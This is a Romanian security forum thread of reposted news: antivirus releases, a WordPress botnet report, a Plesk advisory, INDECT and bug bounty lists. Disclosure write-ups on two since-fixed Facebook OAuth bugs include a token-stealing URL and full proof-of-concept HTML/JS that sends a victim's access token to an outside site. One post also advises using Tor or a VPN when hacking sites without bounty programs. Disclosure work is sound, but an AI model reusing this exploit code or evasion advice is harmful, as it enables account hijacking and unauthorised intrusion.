Nytro

[h=1]Spybot +AV 2.1 Beta – Un nou antivirus cu motor BitDefender[/h] By Radu FaraVirusi(com) on April 20, 2013 Spybot era mai demult un nume in industria anti-malware cand venea vorba de detectie si indepartare adware, spyware, troieni. Intre timp performantele sale si notorietatea au scazut. Iata ca acum se relanseaza intr-o noua versiune cu antivirus, folosind motorul BitDefender. Noul produs se numeste Spybot +AV 2.1 si este in testare BETA pe site-ul oficial. Iata caracteristicile produsului: Antivirus scan (Home Edition and above) Enhanced GUI: a simple view has been added to many components and the number of dialogues has been reduced. Colour coded indicator on dialogue boxes for easy reference MRU Scan: ability to tell Spybot to only scan the Most Recently Used files Added scan mode to only scan for usage tracks Improved rootkit scan, suspicious results can be scanned with our File Scan Multi-core processor support in scan engine (Home Edition and above) Live Protection Internet Security: an integrated proxy server blocks access to suspect URLs (Windows 8 is currently not supported) Improved ‘Protected Repair Environment’ – now has its own easy to use Spybot taskbar Updated Boot CD Creator allows to create your own Boot CD with Spybot 1 and 2 Boot sector scanning Extensive white list for system files, now used in more Spybot components Spybot now prompts you to create a white list when installed on newly commissioned systems French and Italian translations now included by default O problema cunoscuta in aceasta versiune este protectia antivirus deficitara pe Windows 8. Pentru mai multe informatii si link-ul de download accesati: Beta Versions | Spybot © ™ - Search & Destroy Sursa: Spybot +AV 2.1 Beta – Un nou antivirus cu motor BitDefender

C/C++ Manual complet - Herbert Schildt C++ pentru incepatori, volumele I si II - Liviu Negrescu Totul despre C si C++ - Kris Jamsa Le gasesti prin librarii. Lasa cacaturile de tutoriale. Dupa ce inveti bine limbajul iti recomand Secrete C++ - Constantin Galatan.

"Astfel, zeci de experti din aceste institutii se vor antrena ca sa poata face fata unui atac cibernetic." Oare cati or sa devina "de-ai nostri"?

Poti sa iti faci nervi, ochii cat cepele si sa iti pierzi noptile uitandu-te la cateva linii de cod incercand sa gasesti problema. Dar are si avantajele sale.

// Edited

Doritori sunt, dar cine vine cu locurile de munca?

Ma pis pe ei de straini, nu imi pasa de ei, mie imi pasa de "ai mei"

Another way to hack Facebook accounts using OAuth vulnerability In recent few months White hat Hacker ,'Nir Goldshlager' reported many critical bugs in Facebook OAuth mechanism, that allowed an attacker to hijack any Facebook account without user's interaction. Another hacker, 'Amine Cherrai' reported a new Facebook OAuth flaw, whose exploitation is actually very similar to Nir Goldshlager's findings but with a new un-patched way. Before reading further, I would like to suggest you to read following post to understand the basic exploitation mechanism: Facebook OAuth flaw allows gaining full control over any Facebook account Facebook hacking accounts using another OAuth vulnerability URL Redirection flaw in Facebook apps push OAuth vulnerability again in action Now, if you are aware about the vulnerability used against Facebook OAuth in redirect_uri parameter in the URL, there is another way that Amine Cherrai found, to bypass the patch applied by Facebook security team. He found another file on Facebook, that allow redirection to steal access_token of victim's accounts. i.e Facebook Cross-Domain Messaging helper . Successful exploitation once again allowed hacker to hijack Facebook accounts using OAuth Flaw. Proof of concept : http://facebook.com/dialog/oauth?client_id=350685531728&response_type=token&display=page&redirect_uri=http%3A%2F%2Ftouch.facebook.com%2Fconnect%2Fxd_arbiter.php%3F%23%21%2Fapps%2Fmidnighthack%2F%3F%26origin%3Dhttp%3A%2F%2Ffacebook.com%2F Video Demonstration: By the way this bug was closed by Facebook Security Team few days back and your social accounts are once again secured, till next finding ! Sursa: Another way to hack Facebook accounts using OAuth vulnerability - Hacking News

Da, posibil in 1990. Dar ce a facut de e asa "cunoscut"? A fost Project Manager la DARPA, dar "in domeniu" ce a realizat?

[h=1]Google Glass are specifica?ii oficiale, se îndreapt? c?tre primii clien?i[/h] Dorian Prodan - 16 apr 2013 Dup? ce a a?â?at curiozitatea tuturor cu detalii succinte despre ochelarii s?i inteligen?i, Google a anun?at ieri sear? c? primele exemplare Glass au p?r?sit liniile de produc?ie ?i se vor îndrepta c?tre clien?i în etape succesive. Pentru început, este vorba doar de cei care au participat anul trecut la Google I/O 2012 ?i au comandat acest produs contra sumei de 1500 de dolari. Cu aceast? ocazie, au fost publicate ?i primele specifica?ii oficiale. Acestea nu includ ?i natura procesorului folosit sau capacitatea bateriei, în acest ultim caz Google sus?inând c? ace?tia vor oferi o autonomie de 24 de ore. Google Glass include un ecran cu rezolu?ia de 640 x 360 pixeli, produc?torul afirmând c? acesta ofer? o experien?? similar? cu cea a unui ecran HD de 25” care este privit de la o distan?? de 2,5 metri. Conectivitatea include un adaptor Wi-Fi 802.11 b/g, o interfa?? Bluetooth ?i un conector Micro USB. Stocarea intern? are o capacitate de 16GB, din care 12 GB sunt disponibili utilizatorului. Camera frontal? ofer? un senzor cu o rezolu?ie de 5 MP care este capabil? s? înregistreze secven?e video 720p. Partea audio a fost tratat într-un mod ceva mai exotic, Google Glass urmând s? foloseasc? un transductor care va transmite sunetul prin rezonan?a oaselor craniului. Dup? cum se observ?, ochelarii Google Glass nu includ o conexiune de date, fiind dependen?i din acest punct de vedere de un smartphone sau o tablet? Android. În acest scop, Google a lansat ?i aplica?ia MyGlass, care necesit? Android 4.0.3 sau mai nou, ?i care va media serviciile GPS ?i SMS. Aceast? aplica?ie este înso?it? de publicarea ghidului pentru dezvoltarea aplica?iilor software, programatorii interesa?i putând afla la ce s? se a?tepte atunci când vor avea acces la API-urile necesare. Un detaliu interesant este procesarea cloud, toate aplica?iile urmând s? fie intermediate de serverele Google pentru a nu suprasolicita puterea de calcul oferit? de Glass. Sursa: Google Glass are specifica?ii oficiale, se îndreapt? c?tre primii clien?i

Hmm: Contest | tresorit

[h=2]Brute Force Attacks Build WordPress Botnet[/h]Security experts are warning that an escalating series of online attacks designed to break into poorly-secured WordPress blogs is fueling the growth of an unusually powerful botnet currently made up of more than 90,000 Web servers. Over the past week, analysts from a variety of security and networking firms have tracked an alarming uptick in so-called “brute force” password-guessing attacks against Web sites powered by WordPress, perhaps the most popular content management system in use today (this blog also runs WordPress). According to Web site security firm Incapsula, those responsible for this crime campaign are scanning the Internet for WordPress installations, and then attempting to log in to the administrative console at these sites using a custom list of approximately 1,000 of the most commonly-used username and password combinations. Incapsula co-founder Marc Gaffan told KrebsOnSecurity that infected sites will be seeded with a backdoor the lets the attackers control the site remotely (the backdoors persist regardless of whether the legitimate site owner subsequently changes his password). The infected sites then are conscripted into the attacking server botnet, and forced to launch password-guessing attacks against other sites running WordPress. Gaffan said the traffic being generated by all this activity is wreaking havoc for some Web hosting firms. “It’s hurting the service providers the most, not just with incoming traffic,” Gaffan said. “But as soon as those servers get hacked, they are now bombarding other servers with attack traffic. We’re talking about Web servers, not home PCs. PCs maybe connected to the Internet with a 10 megabit or 20 megabit line, but the best hosting providers have essentially unlimited Internet bandwidth. We think they’re building an army of zombies, big servers to bombard other targets for a bigger cause down the road.” Indeed, this was the message driven home Thursday in a blog post from Houston, Texas based HostGator, one of the largest hosting providers in the United States. The company’s data suggests that the botnet of infected WordPress installations now includes more than 90,000 compromised sites. “As I type these words, there is an on-going and highly-distributed, global attack on WordPress installations across virtually every web host in existence,” wrote HostGator’s Sean Valant. ”This attack is well organized and again very, very distributed; we have seen over 90,000 IP addresses involved in this attack.” That assessment was echoed in a blog post Thursday by CloudFlare, content delivery network based in San Francisco. Cloudflare CEO Matthew Prince said the tactics employed in this attack are similar to those used by criminals to build the so-called itsoknoproblembro/Brobot botnet which, in the Fall of 2012, was responsible for a series of rather large cyber attacks against the largest US financial institutions. “One of the concerns of an attack like this is that the attacker is using a relatively weak botnet of home PCs in order to build a much larger botnet of beefy servers in preparation for a future attack,” Prince wrote. ”These larger machines can cause much more damage in DDoS attacks because the servers have large network connections and are capable of generating significant amounts of traffic.” HostGator’s Valant urged WordPress administrators to change their passwords to something that meets the security requirements specified on the WordPress website. These requirements are fairly typical of a secure password: upper and lowercase letters, at least eight characters long, and including “special” characters (^%$#&@*). For more on picking strong passwords, see this tutorial. Users can also restrict access to wp-admin so that it is only reachable from specific IP addresses. Also, WordPress users can take advantage of a third-party plugin from Duo Security, which enables secure logins using one-time codes pushed via text message or an associated mobile app. Matthew Mullenweg, the founding developer of WordPress, suggests site administrators chose a username that is something other than “admin”. In addition, he urged WordPress.com-hosted blogs to turn on two-factor authentication, and to verify that the site is running the latest version of WordPress. “Do this and you’ll be ahead of 99% of sites out there and probably never have a problem,” Mullenweg wrote. Daniel Cid, chief technology officer of Sucuri Security, a company that helps site owners prevent and recover from security breaches, said his team isn’t seeing infected sites being used to attack others; according to Cid, most of the password brute-forcing is being conducted by desktop systems under the attackers’ control. “We saw a big increase in the number of brute force attacks (almost tripled) since previous month’s average,” Cid wrote in an instant message interview. “However, at least from our data, they are not re-using the compromised sites to build a botnet to scan others. I assume that is speculation. On the sites we looked [at] that were hacked, the attackers injected backdoors and malware on them,” including the Blackhole Exploit Kit. Cid also shared a copy of the username/password list that the attackers have been using for the brute-forcing. “The brute force attacks do not seem to be coming from servers, but from desktops,” Cid said. “However, this is still very early, since they are injecting backdoors (a variation of the Filesman backdoor) they can later use the sites to inject malware or even create a botnet and brute force other sites.” According to Sucuri, WordPress administrators who have been hacked should strongly consider taking the following steps to evict the intruders and infections: - Log in to the administrative panel and remove any unfamiliar admin users. - Change all passwords for all admin users (and make sure all legitimate accounts are protected with strong passwords this time). - Update the secret keys inside WordPress (otherwise any rogue admin user can remain logged in). - Reinstall WordPress from scratch or revert to a known, safe backup. Update, 3:05 p.m. ET: Corrected Gaffan’s title. Update, 6:29 p.m. ET: Added quotes and tips from Sucuri Security. Update, Apr. 13, 2013, 12:14 p.m. ET: Added comments from Mullenweg. Sursa: Brute Force Attacks Build WordPress Botnet — Krebs on Security

[h=2]Microsoft: Hold Off Installing MS13-036[/h]Microsoft is urging users to who haven’t installed it yet to hold off on MS13-036, a security update that the company released earlier this week to fix a dangerous security bug in its Windows operating system. The advice comes in response to a spike in complaints from Windows users who found their machines unbootable after applying the update. The MS13-036 update, first released on Tuesday, fixes four vulnerabilities in the Windows kernel-mode driver. In an advisory released April 9, the company said it had removed the download links to the patch while it investigates the source of the problem: “Microsoft is investigating behavior wherein systems may fail to recover from a reboot or applications fails to load after security update 2823324 is applied. Microsoft recommends that customers uninstall this update. As an added precaution, Microsoft has removed the download links to the 2823324 update while we investigate.” The problems with the patch appear to be centered around Windows 7 and certain applications on Windows 7, such as Kaspersky Anti-Virus. Microsoft has issued instructions on how to uninstall this update in the “resolution” section of this advisory. Sursa: Microsoft: Hold Off Installing MS13-036 — Krebs on Security

[h=2]Plesk Panel 11.0.9 privilege escalation vulnerabilities[/h]Original Release date: 10 Apr 2013 | Last revised: 10 Apr 2013 [h=3]Overview[/h] Plesk Panel 11.0.9 and possibly earlier versions contains multiple privilege escalation vulnerabilities. [h=3]Description[/h] [TABLE=class: wrapper-table] [TR] [TD]Plesk Panel contains multiple privilege escalation vulnerabilities which may allow an attacker to run arbitrary code as the root user. Special-case rules in Plesk's custom version of Apache suexec allow execution of arbitrary code as an arbitrary user id above a certain minimum value. In addition, several administrative or system accounts have a user ID above this minimum. Plesk's /usr/sbin/suexec binary (the binary may be present in additional locations, always with suexec in the filename) always allows the binary 'cgi-wrapper', bypassing restrictions on the ownership of the file to be called. Since cgi-wrapper's function is to execute a PHP script based on environment variables (and suexec does not sanitize these environment variables) this allows execution of arbitrary PHP code with a user id above a minimum user ID value that is hardcoded in the suid binary. CVE-2013-0132 The program /usr/local/psa/admin/sbin/wrapper allows the user psaadm to execute various administrative scripts with root privileges. Some of these scripts call external programs without specifying the full path. By specifying a malicious PATH environment variable, an attacker can cause the administrative scripts to call his own program instead of the intended system program. CVE-2013-0133 [/TD] [/TR] [/TABLE] [h=3]Impact[/h] [TABLE=class: wrapper-table] [TR] [TD]An authenticated attacker maybe be able to escalate their privileges to root allowing them to run arbitrary code as the root user. [/TD] [/TR] [/TABLE] [h=3]Solution[/h] We are currently unaware of a practical solution to this problem. Sursa: Vulnerability Note VU#310500 - Plesk Panel 11.0.9 privilege escalation vulnerabilities

[h=3]Remotely Hijacking an Aircraft[/h] There is a lot of buzz on the Internet about a talk at the Hack-in-the Box conference by Hugo Teso, who claims he can hack in to remotely control an airplane's avionics. He even wrote an Android app to do it. I honestly can't tell how real this is, and how much of it is the unique configuration of simulators he tested this on. On the one hand, it can't possibly be true that an aircraft avionics computer accepts outside commands. On the other hand, we've seen lots of security vulnerabilities that seem impossible to be true. Right now, I'm skeptical. EDITED TO ADD (4/12): Three good refutations. Sursa: Schneier on Security: Remotely Hijacking an Aircraft

[h=1]Video Tutorial: Installing Kali Linux on Virtual Box[/h] Author: Jeremy Druin Video Release Announcements: Twitter @webpwnized Title: Installing Kali Linux on Virtual Box with Nessus and Metasploit Link: This video is from the April 2013 workshop of the KY ISSA covering the installation of Kali Linux 1.01 on Virtual Box . Please see notes below the video. Notes: Kali version 1.01 64-bit was used in making the video but the latest version can be downloaded from Downloads | Kali Linux . Documentation on installing and using Kali is available at Kali Linux Official Documentation | Kali Linux The Kali guest virtual machine is configured with 2 GB RAM, 128 GB hard disk drive, and 128 MB of video memory A written tutorial on installing the Virtual Box guest additions can be found at Kali Linux Virtual Box guest | Kali Linux Official Documentation . The command to install packages supporting Virtual Box guest additions used in the video is apt-get update && apt-get install -y linux-headers-$(uname -r) dkms. This includes the installation of the dynamic kernel module support (dkms) packge. This is needed on some systems to compile the Virtual Box guest addition drivers. The version of Nessus used in the demo is Debian 6.0 (64 bits): Nessus-5.0.3-debian6_amd64.deb from the Nessus website Sursa: https://community.rapid7.com/community/infosec/blog/2013/04/10/video-tutorial-installing-kali-linux-on-virtual-box

[h=1]Kaspersky Internet Security 2013 – un an de zile licenta GRATUITA[/h] By Radu FaraVirusi(com) on April 14, 2013 Daca doriti sa testati noua versiune 2013 a Kaspersky Internet Security o puteti face acum pentru un an de zile in mod gratuit. Cum procedati pentru a obtine licenta GRATUITA? Accesati site-ul promotional si descarcati produsul: Kaspersky Lab

[h=2]Stealing Facebook Access Tokens with a Double Submit[/h] After the wave of OAuth bugs reported recently, It’s my turn to present a just as serious (but slightly less complicated) issue. On the Facebook App Center, we have links to numerous different apps. Some have a “Go to App” button, for apps embedded within Facebook, and others have a “Visit Website” button, for sites which connect with Facebook. The “Visit Website” button submits a POST request to ui_server.php, which generates an access token and redirects you to the site. The form is interesting in that it doesn’t present a permissions dialog (like you would have when requesting permissions via /dialog/oauth). This is presumably because the request has to be initiated by the user (due to the presence of a CSRF token), and because the permissions required are listed underneath the button. During testing, I noticed that omitting the CSRF token (fb_dtsg), and orig/new_perms generates a 500 error and doesn’t redirect you. This is expected behaviour. However, in the background, an access token is generated. Refreshing the app’s page in the App Center and hovering over “Visit Website” shows that it is now a link to the site, with your access token included. Using this bug, we can double-submit the permissions form to gain a valid access token. The first request is discarded - the token is generated in the background. The second request is sent after a specific interval (in my PoC I’ve chosen five seconds to be safe, but a wait of one second would suffice), which picks up the already generated token and redirects the user. The awesome thing about this bug is that we don’t need to piggy-back off an already existing app’s permissions like in some of the other bugs, we can specify whatever ones we want (including any of the extended permissions). When the user is sent to the final page, a snippet of their FB inbox is displayed, sweet! In a real-world example, the inbox would obviously not be presented, but logged. [h=4]Full PoC[/h] <!-- index.html --> <html> <head></head> <body> <h3>Facebook Auth PoC - Wait 5 Seconds</h3> <!-- Load the form first --> <div id="iframe-wrap"> <iframe src="frame.html" style="visibility:hidden;"></iframe> </div> <!-- Load the second after 5 seconds --> <script> setTimeout(function(){ document.getElementById('iframe-wrap').innerHTML = '<iframe src="frame.html" style="width:800px;height:500px;"></iframe>'; }, 5000); </script> </body> </html> <!-- frame.html --> <form action="https://www.facebook.com/connect/uiserver.php" method="POST" id="fb"> <input type="hidden" name="perms" value="email,user_likes,publish_actions,read_mailbox"> <input type="hidden" name="dubstep" value="1"> <input type="hidden" name="new_user_session" value="1"> <input type="hidden" name="app_id" value="359849714135684"> <input type="hidden" name="redirect_uri" value="https://fin1te.net/fb-poc/fb.php"> <input type="hidden" name="response_type" value="code"> <input type="hidden" name="from_post" value="1"> <input type="hidden" name="__uiserv_method" value="permissions.request"> <input type="hidden" name="grant_clicked" value="Visit Website"> </form> <script>document.getElementById('fb').submit();</script> [h=4]Fix[/h] Facebook has fixed this issue by redirecting any calls to uiserver.php without the correct tokens to invalid_request.php [h=4]Timeline[/h] 4th April 2013 - Issue Reported 8th April 2013 - Acknowledgment of Report 9th April 2013 - Issue Fixed Sursa: fin1te - Stealing Facebook Access Tokens with a Double Submit

INDECT – proiectul ce duce spionajul cibernetic la extrem sau salvarea cet??enilor din Europa? Publicat de Andrei Av?d?nei 14 Apr, 2013 at 10:00 am INDECT (Intelligent information system supporting observation, searching and detection for security of citizens în urban environment) este un proiect de cercetare ce implic? cercet?tori ?i oameni tehnici din Europa al c?ror scop este dezvoltarea unor solu?ii pentru automatizarea detect?rii de amenin??ri. Obiectivele primare declarate de ace?tia includ dezvoltarea unor algoritmi foarte puternici ce s? imite decizia uman? în încercarea de a combate terorismul ?i alte activit??i criminale, precum traficul de carne vie, pornografie infantil?, detec?ia situa?iilor periculoase (spre exemplu, furturile) sau detectarea obiectelor periculoase (cu?ite, pistoale) în spa?ii publice. Ace?tia sus?in c? astfel de mecanisme sunt extrem de importante pentru siguran?a public?. Tehnologiile dezvoltate de INDECT sunt împ?r?ite în trei categorii Monitorizarea inteligent? a amenin??rilor Detectarea amenin??rilor informatice Protec?ia datelor ?i a intimit??ii INDECT ?i spionajul cibernetic marca Anonymous Proiectul are greutate datorit? numelor mari ce implic? atât universit??i de renume din Europa cat ?i diverse organisme ale politiei statale din diverse ??ri ale continentului. Aparent, ca orice alt? ini?iativ? similar? totul vine în contextul sprijinirii cet??eanului doar c? o înregistrare realizat? de gruparea Anonymous prezint? proiectul INDECT dintr-o perspectiv? îngrijor?toare ce m? face, cel pu?in pe mine, s? m? gândesc de câteva ori dac? acest proiect este sau nu benefic omenirii. V? recomand s? urm?ri?i videoclipul pân? la final. Chiar avem nevoie de a?a ceva? Sincer s? fiu, nu cred. Dar cum în sângele nostru a stat mereu dorin?a de control, de a avea totul la mân? ?i manipulabil, de a avea cele mai mari “lucruri” ?i de a cuceri noi teritorii ?i frontiere, în mod indirect au sosit ?i alternativele de a face acest lucru cu for?a – armele. Putem opri un astfel de proiect? Improbabil. Chiar dac? aceast? variant? a proiectului este închis? cu siguran?? va fi continuat? într-o form? sau alta, într-un mediu sau altul pentru c? odat? ce stacheta este ridicat? e imposibil s? mai d?m înapoi. Omenirea se laud? cu dezvoltarea unora dintre cele mai letare arme de distrugere în mas?, care au trecut de toate filtrele umane ?i exist? state care vorbesc despre acest subiect cum noi, programatorii, ne-am lauda cu ultimul proiect dezvoltat. Dac? acele juc?rii au trecut, acestea ce sau cine le poate împiedica? Dar totu?i? Tot istoria ne arat? c? de?i de-a lungul timpului au fost dezvoltate numeroase tehnologii care, dac? ar sc?pa în mâna publicului larg, ar fi o catastrof? imediat, acestea au fost extrem de bine protejate ?i s-au folosit aproape responsabil, în interesul celor care le-au de?inut, interese prea neimportante oamenilor obi?nui?i. Aici m? gândesc la tehnologiile de supraveghere de la distan??, geolocalizare, mecanisme de monitorizare a traficului de pe Internet sau de la telefonul mobil samd. Sau cel pu?in informa?iile nu au fost f?cute publice. Poate ?i INDECT va ajunge a?a. Ce putem face? S? c?ut?m alternative. Sau s? a?tept?m. Sau s? ne ascundem sub o piatr?. Oricare dintre aceste variante nu va împiedica noile tehnologii s? prospere si s? ajung? s? ne controleze mai subtil dar mai bine. Personal, între un r?zboi cibernetic inteligent ?i unul cu arme de distrugere în mas?, prefer prima variant? de?i cel mai probabil imediat dup? destabilizarea acestei infrastructuri totul ar pica ?i am ajunge tot la a doua situatie. Dar acest subiect este pentru un blog cu o alt? ni??. Sursa: INDECT – proiectul ce duce spionajul cibernetic la extrem sau salvarea cet??enilor din Europa? | WORLDIT

Vom mentine aici o lista cu site-urile care au un program bug bounty. Google http://www.google.com/about/appsecurity/reward-program/ Facebook https://www.facebook.com/whitehat/bounty Mozilla http://www.mozilla.org/security/bug-bounty.html Paypal https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues Secunia http://secunia.com/community/research/svcrp/ Etsy http://codeascraft.etsy.com/2012/09/11/announcing-the-etsy-security-bug-bounty-program/ Barracuda http://www.barracudalabs.com/bugbounty/ ---------------------------------------------------------------------------------------------- Site-uri care vor mentiona persoanele care le raporteaza vulnerabilitati: Adobe http://www.adobe.com/support/security/alertus.html Twitter https://twitter.com/about/security EBay http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html Microsoft http://technet.microsoft.com/en-us/security/ff852094.aspx Apple http://support.apple.com/kb/HT1318 Dropbox https://www.dropbox.com/security Reddit http://code.reddit.com/wiki/help/whitehat Github https://help.github.com/articles/responsible-disclosure-of-security-vulnerabilities Ifixit http://www.ifixit.com/Info/responsible_disclosure 37 Signals http://37signals.com/security-response Twilio http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html Constant Contact http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp Engine Yard http://www.engineyard.com/legal/responsible-disclosure-policy Lastpass https://lastpass.com/support_security.php RedHat https://access.redhat.com/knowledge/articles/66234 Acquia https://www.acquia.com/how-report-security-issue Zynga http://company.zynga.com/security/whitehats Owncloud http://owncloud.org/security/policy Tuenti http://corporate.tuenti.com/en/dev/hall-of-fame Soundcloud http://help.soundcloud.com/customer/portal/articles/439715-responsible-disclosure Nokia Siemens Networks http://www.nokiasiemensnetworks.com/about-us/responsible-disclosure Yandex Bug Bounty http://company.yandex.com/security/hall-of-fame.xml Lista originala: List of Bug Bounty program for PenTesters and Ethical Hackers - E Hacker News Lista este in curs de actualizare. Daca aveti ceva de completat, postati in acest topic si vom actualiza si aici.

RST e o comunitate cu foarte multi oameni pasionati de descoperirea unor probleme de securitate, in special in aplicatiile web. Din moment ce sunt multe persoane carora le face placere sa caute probleme de securitate, de ce sa o faca gratis si nu pentru bani? Bug Bounty Bug Bounty este un program de rasplatire a pasionatilor de securitate IT care raporteaza in mod responsabil o vulnerabilitate, folosit de mai multe companii pentru prevenirea problemelor care pot sa apara prin exploatarea vulnerabilitatilor descoperite in propriile servicii de catre utilizatorii acestora. Exista cateva companii mari (Google, Facebook...) care au decis sa porneasca un astfel de program. Rasplata poate fi atat un premiu in bani, dar si memtionarea celor care le-au descoperit intr-un "Hall of fame", sau alte premii: tricouri, licente pentru produse software etc. Vom mentine o lista cu aceste site-uri aici: https://rstforums.com/forum/67995-informatii-despre-programele-bug-bounty.rst Daca aveti informatii despre noi site-uri inscrise in program sau despre cele deja existente postati acolo pentru a mentine lista actualizata. Pentru pasionati, avantajul il reprezinta premiile pe care le pot primi prin raportarea acestor vulnerabilitati, iar pentru companii avantajul este repararea respectivelor probleme de securitate. Dar daca am gasit o problema intr-un site care nu are un program Bug Bounty? Desigur, puteti cauta probleme de securitate si in site-uri care nu au un astfel de program, insa va indreptati spre ilegalitate. Nu toate companiile considera un privilegiu descoperirea si raportarea unei probleme de securitate, astfel, chiar daca raportati o problema gasita, puteti avea probleme legale, in special daca va pasioneaza site-uri mari, guvernamentale: NASA si altele... Insa de ce sa riscati inchisoarea cand puteti fi rasplatiti pentru raportarea unei vulnerabilitati? Daca inca doriti sa va riscati libertatea, cel putin faceti-o in mod profesionist: Tor, VPN sau alte masuri de protectie si aveti mare grija cand/cum/unde "raportati" problema descoperita! Ce este aceasta categorie? Categoria este destinata persoanelor care descopera probleme de securitate in site-uri cu un program bug bounty. In cazul in care problema este descoperita intr-un serviciu care nu ofera rasplata pentru raportarea vulnerabilitatilor, detaliile (de la informatii minime la full disclosure) se pot posta in categoria ShowOff. Aici se vor posta problemele descoperite in aceste site-uri cat si premiile primite sau alte informatii care ii pot ajuta si incuraja pe altii sa se implice in astfel de activitati. PS: Am mutat doar cateva topicuri aici de la ShowOff, ca exemplu, vom muta aici topicurile de la ShowOff care se incadreaza in aceasta categorie. Imi puteti trimite PM cu topicuri specifice pentru a fi mutate aici.

Coreea de Nord, într-o satir? de la „The New Yorker“: testul cu rachet? a fost anulat din cauza Microsoft Windows 8 Publica?ia american? „The New Yorker“ are o nou? satir? din seria „The Borowitz report“ ?i noile ?inte sunt Coreea de Nord ?i Windows 8 de la Microsoft. „Agen?ia oficial? de pres? din Coreea de Nord a anun?at ast?zi c? testul cu rachet? a fost anulat din cauza problemelor cu Windows 8“, astfel începe textul din „The New Yorker“. Aceast? ?ar? este în centrul aten?iei în aceste zile în urma amenin??rilor sale, iar Andy Borowitz profit? de moment pentru a scrie o satir? în care cuprinde ?i produsul Microsoft. „Agen?iile de informa?ii au spus c? anun?ul ofer? o rar? ocazie de a vedea cum func?ioneaz? programul cu rachet? pe care îl are Coreea de Nord, care anul trecut rula pe Windows 95“, continu? Borowitz. Aceea?i agen?ie oficial? de pres? informeaz? c? testul a fost amânat pe o perioad? nedefinit?. Probabil c? pân? î?i întorc calculatoarele la Windows 95. Autorul publica?iei nu uit? s?-?i certifice informa?iile cu o surs?, cum altfel dac? nu apropiat? regimului nord-coreean. „Liderul suprem Kim Jong Un este furios din cauza problemelor cu Windows 8 ?i ia în calcul mai multe op?iuni, inclusiv aceea de a declara r?zboi Microsoft“, încheie Borowitz articolul s?u. Probabil c? echipamentele Apple sunt un pic prea scumpe. Articolul original este disponibil pe site-ul publica?iei. Sursa: Coreea de Nord, într-o satir? de la „The New Yorker“: testul cu rachet? a fost anulat din cauza Microsoft Windows 8 | adevarul.ro

1. Undefined result, functiile apelate ca parametri in apelul unei functii nu garanteaza ca prima e executata. Afiseaza "paxlozls" sau "lozlspax" in functie de compilator, apoi 40. 2. Comparatie intre numar intreg si float, la fel, undefined results, dar cel mai probabil afiseaza "RST" la infinit deoarece numerele in virgula flotanta nu sunt memorate exact, iar 0.1 poate fi memorat ca 0.09999998 sau ca 1.10000001 sau mai stiu eu cum. Exista o formula de memorare, dar nu mai stiu cum era. 3. La fel, poate afisa de 4-5 ori "HELLO" si de 5-6 ori "WORLD". Va genera si avertismente la compararea dintre un intreg si un numar in virgula flotanta. 4. Nu tin minte prioritatea operatorilor, mereu am o foaie langa mine . Dar fara a consulta tabelul, cred ca "<" are prioritate mai mare, in acest caz se afiseaza "TSR" 5. Nu imi dau seama care-i smecheria. 39? 6. NERFMETINTEAM

Pe 19 mai e deadline pentru cine vrea sa prezinte. Cine vine? Vrea cineva sa prezinte ceva?